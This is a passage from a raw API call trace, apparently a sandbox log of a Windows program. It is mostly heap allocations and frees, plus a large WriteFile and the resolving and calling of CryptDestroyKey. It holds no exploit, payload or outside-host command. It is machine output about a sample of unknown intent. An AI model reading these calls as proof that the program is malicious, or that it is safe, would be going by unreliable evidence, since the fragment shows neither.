dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0146.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f17c60 | out: hHeap=0x970000) returned 1 [0146.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0146.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0146.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2e90338 [0146.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ecb840 | out: hHeap=0x970000) returned 1 [0146.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0146.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0146.858] TranslateMessage (lpMsg=0x8cf708) returned 0 [0146.858] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0146.858] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0146.858] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0146.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0146.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0146.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0146.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0146.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0146.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0146.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2ea3f90 [0146.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.862] WriteFile (in: hFile=0x2a0, lpBuffer=0x2ea3f90*, nNumberOfBytesToWrite=0x13c50, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ea3f90*, lpNumberOfBytesWritten=0x8cf5e4*=0x13c50, lpOverlapped=0x0) returned 1 [0146.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0146.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3f90 | out: hHeap=0x970000) returned 1 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0146.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0146.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0146.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0146.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0146.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0146.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0146.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0146.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0146.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0146.868] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0146.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0146.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e08 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0146.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0146.869] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0146.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0146.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0146.870] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0146.870] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0146.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0146.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0146.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0146.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0146.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0146.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0146.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0146.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0146.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0146.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50890, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0146.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0146.872] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0146.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0146.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0146.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.873] CryptDestroyKey (hKey=0xa87410) returned 1 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0146.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0146.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0146.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0146.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0146.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0146.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0146.875] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0146.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0146.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.876] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0146.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0146.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0146.876] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0146.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0146.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0146.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0146.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0146.876] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0146.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0146.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0146.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0146.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 